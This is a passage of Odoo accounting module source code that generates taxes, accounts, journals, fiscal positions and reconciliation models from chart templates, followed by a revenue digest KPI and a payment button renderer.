Then it saves the new tax templates as default taxes to use for this chart template.
:param company_id: id of the company for which the wizard is running
:param sale_tax_rate: the rate to use for created sales tax
:param purchase_tax_rate: the rate to use for created purchase tax
:return: True
'''
self.ensure_one()
obj_tax_temp = self.env['account.tax.template']
all_parents = self._get_chart_parent_ids()
# create tax templates from purchase_tax_rate and sale_tax_rate fields
if not self.complete_tax_set:
ref_taxs = obj_tax_temp.search([('type_tax_use', '=', 'sale'), ('chart_template_id', 'in', all_parents)], order="sequence, id desc", limit=1)
ref_taxs.write({'amount': sale_tax_rate, 'name': _('Tax %.2f%%') % sale_tax_rate, 'description': '%.2f%%' % sale_tax_rate})
ref_taxs = obj_tax_temp.search([('type_tax_use', '=', 'purchase'), ('chart_template_id', 'in', all_parents)], order="sequence, id desc", limit=1)
ref_taxs.write({'amount': purchase_tax_rate, 'name': _('Tax %.2f%%') % purchase_tax_rate, 'description': '%.2f%%' % purchase_tax_rate})
return True
def _get_chart_parent_ids(self):
""" Returns the IDs of all ancestor charts, including the chart itself.
(inverse of child_of operator)
:return: the IDS of all ancestor charts, including the chart itself.
"""
chart_template = self
result = [chart_template.id]
while chart_template.parent_id:
chart_template = chart_template.parent_id
result.append(chart_template.id)
return result
def _create_bank_journals(self, company, acc_template_ref):
'''
This function creates bank journals and their account for each line
data returned by the function _get_default_bank_journals_data.
:param company: the company for which the wizard is running.
:param acc_template_ref: the dictionary containing the mapping between the ids of account templates and the ids
of the accounts that have been generated from them.
'''
self.ensure_one()
bank_journals = self.env['account.journal']
# Create the journals that will trigger the account.account creation
for acc in self._get_default_bank_journals_data():
bank_journals += self.env['account.journal'].create({
'name': acc['acc_name'],
'type': acc['account_type'],
'company_id': company.id,
'currency_id': acc.get('currency_id', self.env['res.currency']).id,
'sequence': 10
})
return bank_journals
def get_countries_posting_at_bank_rec(self):
""" Returns the list of the country codes of the countries for which, by default,
payments made on bank journals should be creating draft account.move objects,
which get in turn posted when their payment gets reconciled with a bank statement line.
This function is an extension hook for localization modules.
"""
return []
@api.model
def _get_default_bank_journals_data(self):
""" Returns the data needed to create the default bank journals when
installing this chart of accounts, in the form of a list of dictionaries.
The allowed keys in these dictionaries are:
- acc_name: string (mandatory)
- account_type: 'cash' or 'bank' (mandatory)
- currency_id (optional, only to be specified if != company.currency_id)
"""
return [{'acc_name': _('Cash'), 'account_type': 'cash'}, {'acc_name': _('Bank'), 'account_type': 'bank'}]
@api.multi
def open_select_template_wizard(self):
# Add action to open wizard to select between several templates
if not self.company_id.chart_template_id:
todo = self.env['ir.actions.todo']
action_rec = self.env['ir.model.data'].xmlid_to_object('account.action_wizard_multi_chart')
if action_rec:
todo.create({'action_id': action_rec.id, 'name': _('Choose Accounting Template')})
return True
@api.model
def _prepare_transfer_account_for_direct_creation(self, name, company):
""" Prepare values to create a transfer account directly, based on the
method _prepare_transfer_account_template().
This is needed when dealing with installation of payment modules
that requires the creation of their own transfer account.
:param name: The transfer account name.
:param company: The company owning this account.
:return: A dictionary of values to create a new account.account.
"""
vals = self._prepare_transfer_account_template()
digits = self.code_digits or 6
prefix = self.transfer_account_code_prefix or ''
vals.update({
'code': self.env['account.account']._search_new_account_code(company, digits, prefix),
'name': name,
'company_id': company.id,
})
del(vals['chart_template_id'])
return vals
@api.model
def generate_journals(self, acc_template_ref, company, journals_dict=None):
"""
This method is used for creating journals.
:param acc_template_ref: Account templates reference.
:param company_id: company to generate journals for.
:returns: True
"""
JournalObj = self.env['account.journal']
for vals_journal in self._prepare_all_journals(acc_template_ref, company, journals_dict=journals_dict):
journal = JournalObj.create(vals_journal)
if vals_journal['type'] == 'general' and vals_journal['code'] == _('EXCH'):
company.write({'currency_exchange_journal_id': journal.id})
if vals_journal['type'] == 'general' and vals_journal['code'] == _('CABA'):
company.write({'tax_cash_basis_journal_id': journal.id})
return True
@api.multi
def _prepare_all_journals(self, acc_template_ref, company, journals_dict=None):
def _get_default_account(journal_vals, type='debit'):
# Get the default accounts
default_account = False
if journal['type'] == 'sale':
default_account = acc_template_ref.get(self.property_account_income_categ_id.id)
elif journal['type'] == 'purchase':
default_account = acc_template_ref.get(self.property_account_expense_categ_id.id)
elif journal['type'] == 'general' and journal['code'] == _('EXCH'):
if type=='credit':
default_account = acc_template_ref.get(self.income_currency_exchange_account_id.id)
else:
default_account = acc_template_ref.get(self.expense_currency_exchange_account_id.id)
return default_account
journals = [{'name': _('Customer Invoices'), 'type': 'sale', 'code': _('INV'), 'favorite': True, 'color': 11, 'sequence': 5},
{'name': _('Vendor Bills'), 'type': 'purchase', 'code': _('BILL'), 'favorite': True, 'color': 11, 'sequence': 6},
{'name': _('Miscellaneous Operations'), 'type': 'general', 'code': _('MISC'), 'favorite': False, 'sequence': 7},
{'name': _('Exchange Difference'), 'type': 'general', 'code': _('EXCH'), 'favorite': False, 'sequence': 9},
{'name': _('Cash Basis Tax Journal'), 'type': 'general', 'code': _('CABA'), 'favorite': False, 'sequence': 10}]
        if journals_dict is not None:
journals.extend(journals_dict)
self.ensure_one()
journal_data = []
for journal in journals:
vals = {
'type': journal['type'],
'name': journal['name'],
'code': journal['code'],
'company_id': company.id,
'default_credit_account_id': _get_default_account(journal, 'credit'),
'default_debit_account_id': _get_default_account(journal, 'debit'),
'show_on_dashboard': journal['favorite'],
'color': journal.get('color', False),
'sequence': journal['sequence']
}
journal_data.append(vals)
return journal_data
@api.multi
def generate_properties(self, acc_template_ref, company):
"""
        This method is used for creating properties.
:param acc_template_ref: Mapping between ids of account templates and real accounts created from them
:param company_id: company to generate properties for.
:returns: True
"""
self.ensure_one()
PropertyObj = self.env['ir.property']
todo_list = [
('property_account_receivable_id', 'res.partner', 'account.account'),
('property_account_payable_id', 'res.partner', 'account.account'),
('property_account_expense_categ_id', 'product.category', 'account.account'),
('property_account_income_categ_id', 'product.category', 'account.account'),
('property_account_expense_id', 'product.template', 'account.account'),
('property_account_income_id', 'product.template', 'account.account'),
]
for record in todo_list:
account = getattr(self, record[0])
value = account and 'account.account,' + str(acc_template_ref[account.id]) or False
if value:
field = self.env['ir.model.fields'].search([('name', '=', record[0]), ('model', '=', record[1]), ('relation', '=', record[2])], limit=1)
vals = {
'name': record[0],
'company_id': company.id,
'fields_id': field.id,
'value': value,
}
properties = PropertyObj.search([('name', '=', record[0]), ('company_id', '=', company.id)])
if properties:
#the property exist: modify it
properties.write(vals)
else:
#create the property
PropertyObj.create(vals)
stock_properties = [
'property_stock_account_input_categ_id',
'property_stock_account_output_categ_id',
'property_stock_valuation_account_id',
]
for stock_property in stock_properties:
account = getattr(self, stock_property)
value = account and acc_template_ref[account.id] or False
if value:
company.write({stock_property: value})
return True
@api.multi
def _install_template(self, company, code_digits=None, obj_wizard=None, acc_ref=None, taxes_ref=None):
""" Recursively load the template objects and create the real objects from them.
:param company: company the wizard is running for
:param code_digits: number of digits the accounts code should have in the COA
:param obj_wizard: the current wizard for generating the COA from the templates
:param acc_ref: Mapping between ids of account templates and real accounts created from them
:param taxes_ref: Mapping between ids of tax templates and real taxes created from them
:returns: tuple with a dictionary containing
* the mapping between the account template ids and the ids of the real accounts that have been generated
from them, as first item,
* a similar dictionary for mapping the tax templates and taxes, as second item,
        :rtype: tuple(dict, dict)
"""
self.ensure_one()
if acc_ref is None:
acc_ref = {}
if taxes_ref is None:
taxes_ref = {}
if self.parent_id:
tmp1, tmp2 = self.parent_id._install_template(company, code_digits=code_digits, acc_ref=acc_ref, taxes_ref=taxes_ref)
acc_ref.update(tmp1)
taxes_ref.update(tmp2)
# Ensure, even if individually, that everything is translated according to the company's language.
tmp1, tmp2 = self.with_context(lang=company.partner_id.lang)._load_template(company, code_digits=code_digits, account_ref=acc_ref, taxes_ref=taxes_ref)
acc_ref.update(tmp1)
taxes_ref.update(tmp2)
return acc_ref, taxes_ref
@api.multi
def _load_template(self, company, code_digits=None, account_ref=None, taxes_ref=None):
""" Generate all the objects from the templates
:param company: company the wizard is running for
:param code_digits: number of digits the accounts code should have in the COA
:param acc_ref: Mapping between ids of account templates and real accounts created from them
:param taxes_ref: Mapping between ids of tax templates and real taxes created from them
:returns: tuple with a dictionary containing
* the mapping between the account template ids and the ids of the real accounts that have been generated
from them, as first item,
* a similar dictionary for mapping the tax templates and taxes, as second item,
        :rtype: tuple(dict, dict)
"""
self.ensure_one()
if account_ref is None:
account_ref = {}
if taxes_ref is None:
taxes_ref = {}
if not code_digits:
code_digits = self.code_digits
AccountTaxObj = self.env['account.tax']
# Generate taxes from templates.
generated_tax_res = self.with_context(active_test=False).tax_template_ids._generate_tax(company)
taxes_ref.update(generated_tax_res['tax_template_to_tax'])
# Generating Accounts from templates.
account_template_ref = self.generate_account(taxes_ref, account_ref, code_digits, company)
account_ref.update(account_template_ref)
# writing account values after creation of accounts
for key, value in generated_tax_res['account_dict'].items():
if value['refund_account_id'] or value['account_id'] or value['cash_basis_account_id'] or value['cash_basis_base_account_id']:
AccountTaxObj.browse(key).write({
'refund_account_id': account_ref.get(value['refund_account_id'], False),
'account_id': account_ref.get(value['account_id'], False),
'cash_basis_account_id': account_ref.get(value['cash_basis_account_id'], False),
'cash_basis_base_account_id': account_ref.get(value['cash_basis_base_account_id'], False),
})
# Create Journals - Only done for root chart template
if not self.parent_id:
self.generate_journals(account_ref, company)
# generate properties function
self.generate_properties(account_ref, company)
# Generate Fiscal Position , Fiscal Position Accounts and Fiscal Position Taxes from templates
self.generate_fiscal_position(taxes_ref, account_ref, company)
# Generate account operation template templates
self.generate_account_reconcile_model(taxes_ref, account_ref, company)
return account_ref, taxes_ref
@api.multi
def create_record_with_xmlid(self, company, template, model, vals):
return self._create_records_with_xmlid(model, [(template, vals)], company).id
def _create_records_with_xmlid(self, model, template_vals, company):
""" Create records for the given model name with the given vals, and
create xml ids based on each record's template and company id.
"""
if not template_vals:
return self.env[model]
template_model = template_vals[0][0]
template_ids = [template.id for template, vals in template_vals]
template_xmlids = template_model.browse(template_ids).get_external_id()
data_list = []
for template, vals in template_vals:
module, name = template_xmlids[template.id].split('.', 1)
xml_id = "%s.%s_%s" % (module, company.id, name)
data_list.append(dict(xml_id=xml_id, values=vals, noupdate=True))
return self.env[model]._load_records(data_list)
@api.model
def _load_records(self, data_list, update=False):
# When creating a chart template create, for the liquidity transfer account
        # - an account.account.template: this allows defining account.reconcile.model.template objects referring to that liquidity transfer
        #   account although it does not exist in any xml file
        # - an entry in ir_model_data: this allows still using the method create_record_with_xmlid() without making any difference between
        #   regular accounts created and that liquidity transfer account
records = super(AccountChartTemplate, self)._load_records(data_list, update)
account_data_list = []
for data, record in pycompat.izip(data_list, records):
# Create the transfer account only for leaf chart template in the hierarchy.
if record.parent_id:
continue
if data.get('xml_id'):
account_xml_id = data['xml_id'] + '_liquidity_transfer'
if not self.env.ref(account_xml_id, raise_if_not_found=False):
account_vals = record._prepare_transfer_account_template()
account_data_list.append(dict(
xml_id=account_xml_id,
values=account_vals,
noupdate=data.get('noupdate'),
))
self.env['account.account.template']._load_records(account_data_list, update)
return records
def _get_account_vals(self, company, account_template, code_acc, tax_template_ref):
""" This method generates a dictionary of all the values for the account that will be created.
"""
self.ensure_one()
tax_ids = []
for tax in account_template.tax_ids:
tax_ids.append(tax_template_ref[tax.id])
val = {
'name': account_template.name,
'currency_id': account_template.currency_id and account_template.currency_id.id or False,
'code': code_acc,
'user_type_id': account_template.user_type_id and account_template.user_type_id.id or False,
'reconcile': account_template.reconcile,
'note': account_template.note,
'tax_ids': [(6, 0, tax_ids)],
'company_id': company.id,
'tag_ids': [(6, 0, [t.id for t in account_template.tag_ids])],
'group_id': account_template.group_id.id,
}
return val
@api.multi
def generate_account(self, tax_template_ref, acc_template_ref, code_digits, company):
""" This method generates accounts from account templates.
        :param tax_template_ref: Tax templates reference used to write taxes_id in account_account.
:param acc_template_ref: dictionary containing the mapping between the account templates and generated accounts (will be populated)
:param code_digits: number of digits to use for account code.
:param company_id: company to generate accounts for.
:returns: return acc_template_ref for reference purpose.
:rtype: dict
"""
self.ensure_one()
account_tmpl_obj = self.env['account.account.template']
acc_template = account_tmpl_obj.search([('nocreate', '!=', True), ('chart_template_id', '=', self.id)], order='id')
template_vals = []
for account_template in acc_template:
code_main = account_template.code and len(account_template.code) or 0
code_acc = account_template.code or ''
if code_main > 0 and code_main <= code_digits:
code_acc = str(code_acc) + (str('0'*(code_digits-code_main)))
vals = self._get_account_vals(company, account_template, code_acc, tax_template_ref)
template_vals.append((account_template, vals))
accounts = self._create_records_with_xmlid('account.account', template_vals, company)
for template, account in pycompat.izip(acc_template, accounts):
acc_template_ref[template.id] = account.id
return acc_template_ref
def _prepare_reconcile_model_vals(self, company, account_reconcile_model, acc_template_ref, tax_template_ref):
""" This method generates a dictionary of all the values for the account.reconcile.model that will be created.
"""
self.ensure_one()
return {
'name': account_reconcile_model.name,
'sequence': account_reconcile_model.sequence,
'has_second_line': account_reconcile_model.has_second_line,
'company_id': company.id,
'account_id': acc_template_ref[account_reconcile_model.account_id.id],
'label': account_reconcile_model.label,
'amount_type': account_reconcile_model.amount_type,
'force_tax_included': account_reconcile_model.force_tax_included,
'amount': account_reconcile_model.amount,
'tax_id': account_reconcile_model.tax_id and tax_template_ref[account_reconcile_model.tax_id.id] or False,
'second_account_id': account_reconcile_model.second_account_id and acc_template_ref[account_reconcile_model.second_account_id.id] or False,
'second_label': account_reconcile_model.second_label,
'second_amount_type': account_reconcile_model.second_amount_type,
'force_second_tax_included': account_reconcile_model.force_second_tax_included,
'second_amount': account_reconcile_model.second_amount,
'second_tax_id': account_reconcile_model.second_tax_id and tax_template_ref[account_reconcile_model.second_tax_id.id] or False,
'rule_type': account_reconcile_model.rule_type,
'auto_reconcile': account_reconcile_model.auto_reconcile,
'match_journal_ids': [(6, None, account_reconcile_model.match_journal_ids.ids)],
'match_nature': account_reconcile_model.match_nature,
'match_amount': account_reconcile_model.match_amount,
'match_amount_min': account_reconcile_model.match_amount_min,
'match_amount_max': account_reconcile_model.match_amount_max,
'match_label': account_reconcile_model.match_label,
'match_label_param': account_reconcile_model.match_label_param,
'match_same_currency': account_reconcile_model.match_same_currency,
'match_total_amount': account_reconcile_model.match_total_amount,
'match_total_amount_param': account_reconcile_model.match_total_amount_param,
'match_partner': account_reconcile_model.match_partner,
'match_partner_ids': [(6, None, account_reconcile_model.match_partner_ids.ids)],
'match_partner_category_ids': [(6, None, account_reconcile_model.match_partner_category_ids.ids)],
}
@api.multi
def generate_account_reconcile_model(self, tax_template_ref, acc_template_ref, company):
""" This method creates account reconcile models
        :param tax_template_ref: Tax templates reference used to write taxes_id in account_account.
:param acc_template_ref: dictionary with the mapping between the account templates and the real accounts.
:param company_id: company to create models for
:returns: return new_account_reconcile_model for reference purpose.
:rtype: dict
"""
self.ensure_one()
account_reconcile_models = self.env['account.reconcile.model.template'].search([
('chart_template_id', '=', self.id)
])
for account_reconcile_model in account_reconcile_models:
vals = self._prepare_reconcile_model_vals(company, account_reconcile_model, acc_template_ref, tax_template_ref)
self.create_record_with_xmlid(company, account_reconcile_model, 'account.reconcile.model', vals)
return True
@api.multi
def _get_fp_vals(self, company, position):
return {
'company_id': company.id,
'sequence': position.sequence,
'name': position.name,
'note': position.note,
'auto_apply': position.auto_apply,
'vat_required': position.vat_required,
'country_id': position.country_id.id,
'country_group_id': position.country_group_id.id,
'state_ids': position.state_ids and [(6,0, position.state_ids.ids)] or [],
'zip_from': position.zip_from,
'zip_to': position.zip_to,
}
@api.multi
def generate_fiscal_position(self, tax_template_ref, acc_template_ref, company):
""" This method generates Fiscal Position, Fiscal Position Accounts
and Fiscal Position Taxes from templates.
:param taxes_ids: Taxes templates reference for generating account.fiscal.position.tax.
:param acc_template_ref: Account templates reference for generating account.fiscal.position.account.
:param company_id: the company to generate fiscal position data for
:returns: True
"""
self.ensure_one()
positions = self.env['account.fiscal.position.template'].search([('chart_template_id', '=', self.id)])
# first create fiscal positions in batch
template_vals = []
for position in positions:
fp_vals = self._get_fp_vals(company, position)
template_vals.append((position, fp_vals))
fps = self._create_records_with_xmlid('account.fiscal.position', template_vals, company)
# then create fiscal position taxes and accounts
tax_template_vals = []
account_template_vals = []
for position, fp in pycompat.izip(positions, fps):
for tax in position.tax_ids:
tax_template_vals.append((tax, {
'tax_src_id': tax_template_ref[tax.tax_src_id.id],
'tax_dest_id': tax.tax_dest_id and tax_template_ref[tax.tax_dest_id.id] or False,
'position_id': fp.id,
}))
for acc in position.account_ids:
account_template_vals.append((acc, {
'account_src_id': acc_template_ref[acc.account_src_id.id],
'account_dest_id': acc_template_ref[acc.account_dest_id.id],
'position_id': fp.id,
}))
self._create_records_with_xmlid('account.fiscal.position.tax', tax_template_vals, company)
self._create_records_with_xmlid('account.fiscal.position.account', account_template_vals, company)
return True
class AccountTaxTemplate(models.Model):
_name = 'account.tax.template'
_description = 'Templates for Taxes'
_order = 'id'
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Tax Name', required=True)
type_tax_use = fields.Selection([('sale', 'Sales'), ('purchase', 'Purchases'), ('none', 'None'), ('adjustment', 'Adjustment')], string='Tax Scope', required=True, default="sale",
help="Determines where the tax is selectable. Note : 'None' means a tax can't be used by itself, however it can still be used in a group. 'adjustment' is used to perform tax adjustment.")
amount_type = fields.Selection(default='percent', string="Tax Computation", required=True,
selection=[('group', 'Group of Taxes'), ('fixed', 'Fixed'), ('percent', 'Percentage of Price'), ('division', 'Percentage of Price Tax Included')])
active = fields.Boolean(default=True, help="Set active to false to hide the tax without removing it.")
children_tax_ids = fields.Many2many('account.tax.template', 'account_tax_template_filiation_rel', 'parent_tax', 'child_tax', string='Children Taxes')
sequence = fields.Integer(required=True, default=1,
help="The sequence field is used to define order in which the tax lines are applied.")
amount = fields.Float(required=True, digits=(16, 4))
account_id = fields.Many2one('account.account.template', string='Tax Account', ondelete='restrict',
help="Account that will be set on invoice tax lines for invoices. Leave empty to use the expense account.", oldname='account_collected_id')
refund_account_id = fields.Many2one('account.account.template', string='Tax Account on Refunds', ondelete='restrict',
help="Account that will be set on invoice tax lines for refunds. Leave empty to use the expense account.", oldname='account_paid_id')
description = fields.Char(string='Display on Invoices')
price_include = fields.Boolean(string='Included in Price', default=False,
help="Check this if the price you use on the product and invoices includes this tax.")
include_base_amount = fields.Boolean(string='Affect Subsequent Taxes', default=False,
help="If set, taxes which are computed after this one will be computed based on the price tax included.")
analytic = fields.Boolean(string="Analytic Cost", help="If set, the amount computed by this tax will be assigned to the same analytic account as the invoice line (if any)")
tag_ids = fields.Many2many('account.account.tag', string='Account tag', help="Optional tags you may want to assign for custom reporting")
tax_group_id = fields.Many2one('account.tax.group', string="Tax Group")
tax_exigibility = fields.Selection(
[('on_invoice', 'Based on Invoice'),
('on_payment', 'Based on Payment'),
], string='Tax Due', default='on_invoice',
oldname='use_cash_basis',
help="Based on Invoice: the tax is due as soon as the invoice is validated.\n"
"Based on Payment: the tax is due as soon as the payment of the invoice is received.")
cash_basis_account_id = fields.Many2one(
'account.account.template',
string='Tax Received Account',
domain=[('deprecated', '=', False)],
oldname='cash_basis_account',
help='Account used as counterpart for the journal entry, for taxes eligible based on payments.')
cash_basis_base_account_id = fields.Many2one(
'account.account.template',
domain=[('deprecated', '=', False)],
string='Base Tax Received Account',
help='Account that will be set on lines created in cash basis journal entry and used to keep track of the tax base amount.')
_sql_constraints = [
('name_company_uniq', 'unique(name, type_tax_use, chart_template_id)', 'Tax names must be unique !'),
]
@api.multi
@api.depends('name', 'description')
def name_get(self):
res = []
for record in self:
name = record.description and record.description or record.name
res.append((record.id, name))
return res
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionary of all the values for the tax that will be created.
"""
# Compute children tax ids
children_ids = []
for child_tax in self.children_tax_ids:
if tax_template_to_tax.get(child_tax.id):
children_ids.append(tax_template_to_tax[child_tax.id])
self.ensure_one()
val = {
'name': self.name,
'type_tax_use': self.type_tax_use,
'amount_type': self.amount_type,
'active': self.active,
'company_id': company.id,
'sequence': self.sequence,
'amount': self.amount,
'description': self.description,
'price_include': self.price_include,
'include_base_amount': self.include_base_amount,
'analytic': self.analytic,
'tag_ids': [(6, 0, [t.id for t in self.tag_ids])],
'children_tax_ids': [(6, 0, children_ids)],
'tax_exigibility': self.tax_exigibility,
}
if self.tax_group_id:
val['tax_group_id'] = self.tax_group_id.id
return val
@api.multi
def _generate_tax(self, company):
""" This method generate taxes from templates.
:param company: the company for which the taxes should be created from templates in self
:returns: {
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
ChartTemplate = self.env['account.chart.template']
todo_dict = {}
tax_template_to_tax = {}
templates_todo = list(self)
while templates_todo:
templates = templates_todo
templates_todo = []
# create taxes in batch
template_vals = []
for template in templates:
if all(child.id in tax_template_to_tax for child in template.children_tax_ids):
vals = template._get_tax_vals(company, tax_template_to_tax)
template_vals.append((template, vals))
else:
# defer the creation of this tax to the next batch
templates_todo.append(template)
taxes = ChartTemplate._create_records_with_xmlid('account.tax', template_vals, company)
# fill in tax_template_to_tax and todo_dict
for tax, (template, vals) in pycompat.izip(taxes, template_vals):
tax_template_to_tax[template.id] = tax.id
# Since the accounts have not been created yet, we have to wait before filling these fields
todo_dict[tax.id] = {
'account_id': template.account_id.id,
'refund_account_id': template.refund_account_id.id,
'cash_basis_account_id': template.cash_basis_account_id.id,
'cash_basis_base_account_id': template.cash_basis_base_account_id.id,
}
if any(template.tax_exigibility == 'on_payment' for template in self):
# When a CoA is being installed automatically and if it is creating account tax(es) whose field `Use Cash Basis`(tax_exigibility) is set to True by default
# (example of such CoA's are l10n_fr and l10n_mx) then in the `Accounting Settings` the option `Cash Basis` should be checked by default.
company.tax_exigibility = True
return {
'tax_template_to_tax': tax_template_to_tax,
'account_dict': todo_dict
}
# Fiscal Position Templates
class AccountFiscalPositionTemplate(models.Model):
_name = 'account.fiscal.position.template'
_description = 'Template for Fiscal Position'
sequence = fields.Integer()
name = fields.Char(string='Fiscal Position Template', required=True)
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
account_ids = fields.One2many('account.fiscal.position.account.template', 'position_id', string='Account Mapping')
tax_ids = fields.One2many('account.fiscal.position.tax.template', 'position_id', string='Tax Mapping')
note = fields.Text(string='Notes')
auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
country_id = fields.Many2one('res.country', string='Country',
help="Apply only if delivery or invoicing country match.")
country_group_id = fields.Many2one('res.country.group', string='Country Group',
help="Apply only if delivery or invoicing country match the group.")
state_ids = fields.Many2many('res.country.state', string='Federal States')
zip_from = fields.Integer(string='Zip Range From', default=0)
zip_to = fields.Integer(string='Zip Range To', default=0)
class AccountFiscalPositionTaxTemplate(models.Model):
_name = 'account.fiscal.position.tax.template'
_description = 'Tax Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Position', required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax.template', string='Tax Source', required=True)
tax_dest_id = fields.Many2one('account.tax.template', string='Replacement Tax')
class AccountFiscalPositionAccountTemplate(models.Model):
_name = 'account.fiscal.position.account.template'
_description = 'Accounts Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Mapping', required=True, ondelete='cascade')
account_src_id = fields.Many2one('account.account.template', string='Account Source', required=True)
account_dest_id = fields.Many2one('account.account.template', string='Account Destination', required=True)
class AccountReconcileModelTemplate(models.Model):
_name = "account.reconcile.model.template"
_description = 'Reconcile Model Template'
# Base fields.
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Button Label', required=True)
sequence = fields.Integer(required=True, default=10)
rule_type = fields.Selection(selection=[
('writeoff_button', _('Manually create a write-off on clicked button.')),
('writeoff_suggestion', _('Suggest a write-off.')),
('invoice_matching', _('Match existing invoices/bills.'))
], string='Type', default='writeoff_button', required=True)
auto_reconcile = fields.Boolean(string='Auto-validate',
help='Validate the statement line automatically (reconciliation based on your rule).')
# ===== Conditions =====
match_journal_ids = fields.Many2many('account.journal', string='Journals',
domain="[('type', 'in', ('bank', 'cash'))]",
help='The reconciliation model will only be available from the selected journals.')
match_nature = fields.Selection(selection=[
('amount_received', 'Amount Received'),
('amount_paid', 'Amount Paid'),
('both', 'Amount Paid/Received')
], string='Amount Nature', required=True, default='both',
help='''The reconciliation model will only be applied to the selected transaction type:
* Amount Received: Only applied when receiving an amount.
* Amount Paid: Only applied when paying an amount.
* Amount Paid/Received: Applied in both cases.''')
match_amount = fields.Selection(selection=[
('lower', 'Is Lower Than'),
('greater', 'Is Greater Than'),
('between', 'Is Between'),
], string='Amount',
        help='The reconciliation model will only be applied when the amount is lower than, greater than, or between the specified amount(s).')
match_amount_min = fields.Float(string='Amount Min Parameter')
match_amount_max = fields.Float(string='Amount Max Parameter')
match_label = fields.Selection(selection=[
('contains', 'Contains'),
('not_contains', 'Not Contains'),
('match_regex', 'Match Regex'),
], string='Label', help='''The reconciliation model will only be applied when the label:
        * Contains: The proposition label must contain this string (case insensitive).
* Not Contains: Negation of "Contains".
* Match Regex: Define your own regular expression.''')
match_label_param = fields.Char(string='Label Parameter')
match_same_currency = fields.Boolean(string='Same Currency Matching', default=True,
help='Restrict to propositions having the same currency as the statement line.')
match_total_amount = fields.Boolean(string='Amount Matching', default=True,
help='The sum of total residual amount propositions matches the statement line amount.')
match_total_amount_param = fields.Float(string='Amount Matching %', default=100,
help='The sum of total residual amount propositions matches the statement line amount under this percentage.')
match_partner = fields.Boolean(string='Partner Is Set',
help='The reconciliation model will only be applied when a customer/vendor is set.')
match_partner_ids = fields.Many2many('res.partner', string='Restrict Partners to',
help='The reconciliation model will only be applied to the selected customers/vendors.')
match_partner_category_ids = fields.Many2many('res.partner.category', string='Restrict Partner Categories to',
help='The reconciliation model will only be applied to the selected customer/vendor categories.')
# First part fields.
account_id = fields.Many2one('account.account.template', string='Account', ondelete='cascade', domain=[('deprecated', '=', False)])
label = fields.Char(string='Journal Item Label')
amount_type = fields.Selection([
('fixed', 'Fixed'),
('percentage', 'Percentage of balance')
], required=True, default='percentage')
amount = fields.Float(string='Write-off Amount', digits=0, required=True, default=100.0, help="Fixed amount will count as a debit if it is negative, as a credit if it is positive.")
force_tax_included = fields.Boolean(string='Tax Included in Price',
help='Force the tax to be managed as a price included tax.')
tax_id = fields.Many2one('account.tax.template', string='Tax', ondelete='restrict', domain=[('type_tax_use', '=', 'purchase')])
# Second part fields.
has_second_line = fields.Boolean(string='Add a second line', default=False)
second_account_id = fields.Many2one('account.account.template', string='Second Account', ondelete='cascade', domain=[('deprecated', '=', False)])
second_label = fields.Char(string='Second Journal Item Label')
second_amount_type = fields.Selection([
('fixed', 'Fixed'),
('percentage', 'Percentage of amount')
], string="Second Amount type",required=True, default='percentage')
second_amount = fields.Float(string='Second Write-off Amount', digits=0, required=True, default=100.0, help="Fixed amount will count as a debit if it is negative, as a credit if it is positive.")
force_second_tax_included = fields.Boolean(string='Second Tax Included in Price',
help='Force the second tax to be managed as a price included tax.')
second_tax_id = fields.Many2one('account.tax.template', string='Second Tax', ondelete='restrict', domain=[('type_tax_use', '=', 'purchase')])
```
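For orientation (not part of the module), loading a chart template onto a company boils down to a single call on the template record; a brief sketch as it might be run from an Odoo shell, where the XML id is an assumption (the generic chart of accounts) and any installed account.chart.template record works the same way:
```python
# Hedged usage sketch for an Odoo shell session; the XML id is an assumption.
chart_template = env.ref('l10n_generic_coa.configurable_chart_template')
# Install it only if the current company has no chart of accounts yet:
chart_template.try_loading_for_current_company()
# Or force the load with explicit default sale/purchase tax rates:
chart_template.load_for_current_company(15.0, 15.0)
```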
#### File: account/models/digest.py
```python
from odoo import fields, models, _
from odoo.exceptions import AccessError
class Digest(models.Model):
_inherit = 'digest.digest'
kpi_account_total_revenue = fields.Boolean('Revenue')
kpi_account_total_revenue_value = fields.Monetary(compute='_compute_kpi_account_total_revenue_value')
def _compute_kpi_account_total_revenue_value(self):
if not self.env.user.has_group('account.group_account_invoice'):
raise AccessError(_("Do not have access, skip this data for user's digest email"))
for record in self:
start, end, company = record._get_kpi_compute_parameters()
account_moves = self.env['account.move'].read_group([
('journal_id.type', '=', 'sale'),
('company_id', '=', company.id),
('date', '>=', start),
('date', '<', end)], ['journal_id', 'amount'], ['journal_id'])
record.kpi_account_total_revenue_value = sum([account_move['amount'] for account_move in account_moves])
def compute_kpis_actions(self, company, user):
res = super(Digest, self).compute_kpis_actions(company, user)
res['kpi_account_total_revenue'] = 'account.action_invoice_tree1&menu_id=%s' % self.env.ref('account.menu_finance').id
return res
```
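The revenue KPI above sums the `amount` aggregate returned by `read_group`; a small sketch (values are illustrative) of the shape being consumed:
```python
# Illustrative read_group result for a many2one groupby: one dict per journal,
# with the grouping field as an (id, display_name) pair and the summed amount.
account_moves = [
    {'journal_id': (1, 'Customer Invoices'), 'journal_id_count': 3, 'amount': 1250.0},
    {'journal_id': (5, 'Point of Sale'), 'journal_id_count': 2, 'amount': 480.0},
]
total = sum(move['amount'] for move in account_moves)
assert total == 1730.0
```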
#### File: account_payment/models/payment.py
```python
import logging
from odoo import fields, models, _
from odoo.tools import float_compare
_logger = logging.getLogger(__name__)
class PaymentTransaction(models.Model):
_inherit = 'payment.transaction'
def render_invoice_button(self, invoice, submit_txt=None, render_values=None):
values = {
'partner_id': invoice.partner_id.id,
}
if render_values:
values.update(render_values)
return self.acquirer_id.with_context(submit_class='btn btn-primary', submit_txt=submit_txt or _('Pay Now')).sudo().render(
self.reference,
invoice.residual_signed,
invoice.currency_id.id,
values=values,
)
```
